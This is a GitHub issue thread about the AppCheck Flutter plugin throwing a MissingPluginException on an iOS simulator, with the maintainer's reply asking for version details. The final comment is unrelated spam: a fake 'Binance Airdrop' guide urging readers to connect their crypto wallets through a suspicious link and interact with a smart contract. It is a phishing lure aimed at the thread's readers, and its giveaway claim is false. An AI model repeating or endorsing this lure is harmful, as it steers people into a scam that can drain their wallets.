### ISSUE TITLE
Running example code, with exception thrown out

### ISSUE THREAD

**Issue by TchiangW** [yash-garg/AppCheck#5]
Nothing changed, just copy, build & run on Stimulator iOS (iPhone 14), and this exception been thrown out  

```
[VERBOSE-2:dart_vm_initializer.cc(41)] Unhandled Exception: MissingPluginException(No implementation found for method checkAvailability on channel dev.yashgarg/appcheck)
#0      MethodChannel._invokeMethod
platform_channel.dart:313
<asynchronous suspension>
#1      AppCheck.checkAvailability
appcheck.dart:59
<asynchronous suspension>
#2      _AppCheckExampleState.getApps
app_checker.dart:52
<asynchronous suspension>
```

**Comment by yash-garg** [comment]
@TchiangW I don't have any device with macOS to check it right now, but can it be related to #4?

Also, please specify the Flutter and Package version you are using!

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.
